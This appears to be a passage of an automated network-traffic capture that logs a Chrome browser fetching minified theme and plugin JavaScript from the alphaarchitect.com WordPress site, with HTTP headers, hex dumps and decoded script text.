                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC1369INData Raw: 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 65 29 29 7d 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 29 7b 6a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 3b 76 61 72 20 61 3d 7b 7d 2c 65 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2c 73 3d 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 66 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 65 5b 74 5d 3d 6e 2e 76 61 6c 75 65 7d 2c 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3f 53 79 6d 62 6f 6c 3a 7b 7d 2c 6f 3d 74 2e 69 74 65 72 61 74 6f 72 7c 7c 22 40 40 69 74 65 72 61 74 6f 72 22 2c 6e 3d
                                                                                                                                                                                                                                                                        Data Ascii: ,Object.getOwnPropertyDescriptor(n,e))})}return t}function j(){j=function(){return a};var a={},e=Object.prototype,s=e.hasOwnProperty,f=Object.defineProperty||function(e,t,n){e[t]=n.value},t="function"==typeof Symbol?Symbol:{},o=t.iterator||"@@iterator",n=
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC1369INData Raw: 29 3a 61 3a 28 6e 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 6e 2e 61 72 67 3d 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 69 74 65 72 61 74 6f 72 20 72 65 73 75 6c 74 20 69 73 20 6e 6f 74 20 61 6e 20 6f 62 6a 65 63 74 22 29 2c 6e 2e 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 68 29 7d 28 6e 2c 75 29 3b 69 66 28 72 29 7b 69 66 28 72 3d 3d 3d 68 29 63 6f 6e 74 69 6e 75 65 3b 72 65 74 75 72 6e 20 72 7d 7d 69 66 28 22 6e 65 78 74 22 3d 3d 3d 75 2e 6d 65 74 68 6f 64 29 75 2e 73 65 6e 74 3d 75 2e 5f 73 65 6e 74 3d 75 2e 61 72 67 3b 65 6c 73 65 20 69 66 28 22 74 68 72 6f 77 22 3d 3d 3d 75 2e 6d 65 74 68 6f 64 29 7b 69 66 28 22 73 75 73 70 65 6e 64 65 64 53 74 61 72 74 22 3d 3d 3d 63 29 74 68 72 6f 77 20 63 3d 22 63 6f 6d 70 6c 65 74 65 64 22 2c 75 2e 61 72
                                                                                                                                                                                                                                                                        Data Ascii: ):a:(n.method="throw",n.arg=new TypeError("iterator result is not an object"),n.delegate=null,h)}(n,u);if(r){if(r===h)continue;return r}}if("next"===u.method)u.sent=u._sent=u.arg;else if("throw"===u.method){if("suspendedStart"===c)throw c="completed",u.ar
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC1369INData Raw: 6f 29 7d 29 7d 6f 28 69 2e 61 72 67 29 7d 28 6e 2c 72 2c 65 2c 74 29 7d 29 7d 72 65 74 75 72 6e 20 74 3d 74 3f 74 2e 74 68 65 6e 28 65 2c 65 29 3a 65 28 29 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 76 61 72 20 74 3d 7b 74 72 79 4c 6f 63 3a 65 5b 30 5d 7d 3b 31 20 69 6e 20 65 26 26 28 74 2e 63 61 74 63 68 4c 6f 63 3d 65 5b 31 5d 29 2c 32 20 69 6e 20 65 26 26 28 74 2e 66 69 6e 61 6c 6c 79 4c 6f 63 3d 65 5b 32 5d 2c 74 2e 61 66 74 65 72 4c 6f 63 3d 65 5b 33 5d 29 2c 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 2e 70 75 73 68 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 45 28 65 29 7b 76 61 72 20 74 3d 65 2e 63 6f 6d 70 6c 65 74 69 6f 6e 7c 7c 7b 7d 3b 74 2e 74 79 70 65 3d 22 6e 6f 72 6d 61 6c 22 2c 64 65 6c 65 74 65 20 74 2e 61 72 67 2c 65 2e 63 6f 6d
                                                                                                                                                                                                                                                                        Data Ascii: o)})}o(i.arg)}(n,r,e,t)})}return t=t?t.then(e,e):e()}})}function k(e){var t={tryLoc:e[0]};1 in e&&(t.catchLoc=e[1]),2 in e&&(t.finallyLoc=e[2],t.afterLoc=e[3]),this.tryEntries.push(t)}function E(e){var t=e.completion||{};t.type="normal",delete t.arg,e.com
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC1369INData Raw: 6c 75 65 3a 69 2e 6e 65 78 74 28 29 7d 29 7d 2c 77 28 67 29 2c 69 28 67 2c 72 2c 22 47 65 6e 65 72 61 74 6f 72 22 29 2c 69 28 67 2c 6f 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 29 2c 69 28 67 2c 22 74 6f 53 74 72 69 6e 67 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 47 65 6e 65 72 61 74 6f 72 5d 22 7d 29 2c 61 2e 6b 65 79 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 28 65 29 2c 72 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 6e 29 72 2e 70 75 73 68 28 74 29 3b 72 65 74 75 72 6e 20 72 2e 72 65 76 65 72 73 65 28 29 2c 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 66 6f 72 28 3b 72 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 74 3d 72 2e 70 6f 70 28 29 3b 69 66
                                                                                                                                                                                                                                                                        Data Ascii: lue:i.next()})},w(g),i(g,r,"Generator"),i(g,o,function(){return this}),i(g,"toString",function(){return"[object Generator]"}),a.keys=function(e){var n=Object(e),r=[];for(var t in n)r.push(t);return r.reverse(),function e(){for(;r.length;){var t=r.pop();if
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC1369INData Raw: 62 72 75 70 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 2e 6c 65 6e 67 74 68 2d 31 3b 30 3c 3d 6e 3b 2d 2d 6e 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 5b 6e 5d 3b 69 66 28 72 2e 74 72 79 4c 6f 63 3c 3d 74 68 69 73 2e 70 72 65 76 26 26 73 2e 63 61 6c 6c 28 72 2c 22 66 69 6e 61 6c 6c 79 4c 6f 63 22 29 26 26 74 68 69 73 2e 70 72 65 76 3c 72 2e 66 69 6e 61 6c 6c 79 4c 6f 63 29 7b 76 61 72 20 6f 3d 72 3b 62 72 65 61 6b 7d 7d 6f 26 26 28 22 62 72 65 61 6b 22 3d 3d 3d 65 7c 7c 22 63 6f 6e 74 69 6e 75 65 22 3d 3d 3d 65 29 26 26 6f 2e 74 72 79 4c 6f 63 3c 3d 74 26 26 74 3c 3d 6f 2e 66 69 6e 61 6c 6c 79 4c 6f 63 26 26 28 6f 3d 6e 75 6c 6c 29 3b 76 61 72 20 69
                                                                                                                                                                                                                                                                        Data Ascii: brupt:function(e,t){for(var n=this.tryEntries.length-1;0<=n;--n){var r=this.tryEntries[n];if(r.tryLoc<=this.prev&&s.call(r,"finallyLoc")&&this.prev<r.finallyLoc){var o=r;break}}o&&("break"===e||"continue"===e)&&o.tryLoc<=t&&t<=o.finallyLoc&&(o=null);var i
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC1369INData Raw: 22 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 63 28 72 2c 74 2c 6e 2c 6f 2c 69 2c 22 74 68 72 6f 77 22 2c 65 29 7d 6f 28 76 6f 69 64 20 30 29 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61
                                                                                                                                                                                                                                                                        Data Ascii: ",e)}function i(e){c(r,t,n,o,i,"throw",e)}o(void 0)})}}function l(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function o(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"va
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC1369INData Raw: 6e 67 2e 63 61 6c 6c 28 74 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 29 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 74 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 29 7b 69 66 28 72 2e 68 61 73 28 65 29 29 72 65 74 75 72 6e 20 72 2e 67 65 74 28 65 29 3b 72 2e 73 65 74 28 65 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 61 72 67 75 6d 65 6e 74 73 2c 69 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74
                                                                                                                                                                                                                                                                        Data Ascii: ng.call(t).indexOf("[native code]")))return e;var t;if("function"!=typeof e)throw new TypeError("Super expression must either be null or a function");if(void 0!==r){if(r.has(e))return r.get(e);r.set(e,n)}function n(){return d(e,arguments,i(this).construct
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC1369INData Raw: 6f 6e 63 61 74 28 65 2e 73 75 62 73 74 72 28 31 29 29 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 72 65 74 75 72 6e 2f 5e 28 68 74 74 70 73 3f 3a 29 3f 5c 2f 5c 2f 28 28 28 28 70 6c 61 79 65 72 7c 77 77 77 29 5c 2e 29 3f 76 69 6d 65 6f 5c 2e 63 6f 6d 29 7c 28 28 70 6c 61 79 65 72 5c 2e 29 3f 5b 61 2d 7a 41 2d 5a 30 2d 39 2d 5d 2b 5c 2e 76 69 64 65 6f 6a 69 5c 2e 68 6b 29 29 28 3f 3d 24 7c 5c 2f 29 2f 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 77 28 65 29 7b 72 65 74 75 72 6e 2f 5e 68 74 74 70 73 3a 5c 2f 5c 2f 70 6c 61 79 65 72 5c 2e 28 28 76 69 6d 65 6f 5c 2e 63 6f 6d 29 7c 28 5b 61 2d 7a 41 2d 5a 30 2d 39 2d 5d 2b 5c 2e 76 69 64 65 6f 6a 69 5c 2e 68 6b 29 29 5c 2f 76 69 64 65 6f 5c 2f 5c 64 2b 2f 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                        Data Ascii: oncat(e.substr(1))}function g(e){return/^(https?:)?\/\/((((player|www)\.)?vimeo\.com)|((player\.)?[a-zA-Z0-9-]+\.videoji\.hk))(?=$|\/)/.test(e)}function w(e){return/^https:\/\/player\.((vimeo\.com)|([a-zA-Z0-9-]+\.videoji\.hk))\/video\/\d+/.test(e)}functi
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC1369INData Raw: 74 69 6f 6e 20 53 28 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 68 69 73 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 6f 6e 73 74 72 75 63 74 6f 72 20 57 65 61 6b 4d 61 70 20 72 65 71 75 69 72 65 73 20 27 6e 65 77 27 22 29 3b 69 66 28 4f 28 74 68 69 73 2c 22 5f 69 64 22 2c 22 5f 57 65 61 6b 4d 61 70 5f 22 2b 4e 28 29 2b 22 2e 22 2b 4e 28 29 29 2c 30 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 57 65 61 6b 4d 61 70 20 69 74 65 72 61 62 6c 65 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 22 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 65 2c 74 29 7b 69 66 28 21 46 28 65 29 7c 7c 21 54 2e 63 61 6c 6c 28 65 2c 22 5f 69 64 22 29 29 74 68 72 6f 77 20 6e 65 77 20 54
                                                                                                                                                                                                                                                                        Data Ascii: tion S(){if(void 0===this)throw new TypeError("Constructor WeakMap requires 'new'");if(O(this,"_id","_WeakMap_"+N()+"."+N()),0<arguments.length)throw new TypeError("WeakMap iterable is not supported")}function C(e,t){if(!F(e)||!T.call(e,"_id"))throw new T


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        134192.168.2.449892141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC841OUTGET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/awb-background-slider.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:03 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-80c"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147820
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba324c2a4387-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC878INData Raw: 38 30 63 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 7b 73 6c 69 64 65 3a 7b 70 72 65 76 3a 7b 74 72 61 6e 73 6c 61 74 65 3a 5b 30 2c 22 2d 31 30 30 25 22 2c 30 5d 2c 6f 70 61 63 69 74 79 3a 30 7d 2c 6e 65 78 74 3a 7b 74 72 61 6e 73 6c 61 74 65 3a 5b 30 2c 22 31 30 30 25 22 2c 30 5d 2c 6f 70 61 63 69 74 79 3a 30 7d 7d 2c 73 6c 69 64 65 5f 64 6f 77 6e 3a 7b 70 72 65 76 3a 7b 74 72 61 6e 73 6c 61 74 65 3a 5b 30 2c 22 31 30 30 25 22 2c 30 5d 2c 6f 70 61 63 69 74 79 3a 30 7d 2c 6e 65 78 74 3a 7b 74 72 61 6e 73 6c 61 74 65 3a 5b 30 2c 22 2d 31 30 30 25 22 2c 30 5d 2c 6f 70 61 63 69 74 79 3a 30 7d 7d 2c 73 6c 69 64 65 5f 6c 65 66 74 3a 7b 70 72 65 76 3a 7b 74 72 61 6e 73 6c 61 74 65 3a 5b 22 2d 31 30 30 25 22 2c 30 2c 30 5d 2c 6f 70 61
                                                                                                                                                                                                                                                                        Data Ascii: 80c!function(e){const t={slide:{prev:{translate:[0,"-100%",0],opacity:0},next:{translate:[0,"100%",0],opacity:0}},slide_down:{prev:{translate:[0,"100%",0],opacity:0},next:{translate:[0,"-100%",0],opacity:0}},slide_left:{prev:{translate:["-100%",0,0],opa
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC1189INData Raw: 3d 3d 3d 6e 3f 22 66 61 64 65 22 3a 22 63 72 65 61 74 69 76 65 22 3b 6c 65 74 20 69 3d 22 63 72 65 61 74 69 76 65 22 3d 3d 3d 73 3f 74 5b 6e 5d 3a 22 22 3b 63 6f 6e 73 74 20 63 3d 22 6e 6f 22 3d 3d 3d 61 2e 64 61 74 61 73 65 74 2e 6c 6f 6f 70 2c 6c 3d 4e 75 6d 62 65 72 28 61 2e 64 61 74 61 73 65 74 2e 73 6c 69 64 65 73 68 6f 77 53 70 65 65 64 29 7c 7c 35 65 33 2c 72 3d 4e 75 6d 62 65 72 28 61 2e 64 61 74 61 73 65 74 2e 61 6e 69 6d 61 74 69 6f 6e 53 70 65 65 64 29 7c 7c 38 30 30 2c 64 3d 61 2e 64 61 74 61 73 65 74 2e 64 69 72 65 63 74 69 6f 6e 7c 7c 22 75 70 22 2c 70 3d 61 2e 64 61 74 61 73 65 74 2e 70 61 75 73 65 5f 6f 6e 5f 68 6f 76 65 72 7c 7c 21 31 3b 6c 65 74 20 75 3d 22 2e 66 75 73 69 6f 6e 2d 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 22 3b 22 63 6f
                                                                                                                                                                                                                                                                        Data Ascii: ===n?"fade":"creative";let i="creative"===s?t[n]:"";const c="no"===a.dataset.loop,l=Number(a.dataset.slideshowSpeed)||5e3,r=Number(a.dataset.animationSpeed)||800,d=a.dataset.direction||"up",p=a.dataset.pause_on_hover||!1;let u=".fusion-flex-container";"co
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        135192.168.2.449893141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC618OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-crossfade-images.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:03 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-1a1"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147820
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba3269a7431c-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC424INData Raw: 31 61 31 0d 0a 66 75 6e 63 74 69 6f 6e 20 66 75 73 69 6f 6e 52 65 73 69 7a 65 43 72 6f 73 73 66 61 64 65 49 6d 61 67 65 73 43 6f 6e 74 61 69 6e 65 72 28 65 29 7b 76 61 72 20 69 3d 30 3b 65 2e 66 69 6e 64 28 22 69 6d 67 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 68 65 69 67 68 74 28 29 3b 65 3e 69 26 26 28 69 3d 65 29 7d 29 2c 65 2e 63 73 73 28 22 68 65 69 67 68 74 22 2c 69 29 7d 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 72 65 73 69 7a 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 22 2e 63 72 6f 73 73 66 61 64 65 2d 69 6d 61 67 65 73 22 29 2e 65 61
                                                                                                                                                                                                                                                                        Data Ascii: 1a1function fusionResizeCrossfadeImagesContainer(e){var i=0;e.find("img").each(function(){var e=jQuery(this).height();e>i&&(i=e)}),e.css("height",i)}jQuery(window).on("load",function(){jQuery(window).on("resize",function(){jQuery(".crossfade-images").ea
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        136192.168.2.449895141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC837OUTGET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-animations.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:03 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-763"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147820
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba33df4342c2-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC878INData Raw: 37 36 33 0d 0a 66 75 6e 63 74 69 6f 6e 20 66 75 73 69 6f 6e 53 65 74 41 6e 69 6d 61 74 69 6f 6e 44 61 74 61 28 69 29 7b 22 6f 66 66 22 3d 3d 3d 66 75 73 69 6f 6e 41 6e 69 6d 61 74 69 6f 6e 73 56 61 72 73 2e 73 74 61 74 75 73 5f 63 73 73 5f 61 6e 69 6d 61 74 69 6f 6e 73 7c 7c 63 73 73 75 61 2e 75 61 2e 6d 6f 62 69 6c 65 26 26 22 64 65 73 6b 74 6f 70 5f 61 6e 64 5f 6d 6f 62 69 6c 65 22 21 3d 3d 66 75 73 69 6f 6e 41 6e 69 6d 61 74 69 6f 6e 73 56 61 72 73 2e 73 74 61 74 75 73 5f 63 73 73 5f 61 6e 69 6d 61 74 69 6f 6e 73 3f 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 61 64 64 43 6c 61 73 73 28 22 64 6f 6e 74 2d 61 6e 69 6d 61 74 65 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 64 6f 2d 61 6e 69 6d 61 74 65 22 29 3a 28 6a 51 75 65 72 79 28 22 62 6f 64 79 22
                                                                                                                                                                                                                                                                        Data Ascii: 763function fusionSetAnimationData(i){"off"===fusionAnimationsVars.status_css_animations||cssua.ua.mobile&&"desktop_and_mobile"!==fusionAnimationsVars.status_css_animations?jQuery("body").addClass("dont-animate").removeClass("do-animate"):(jQuery("body"
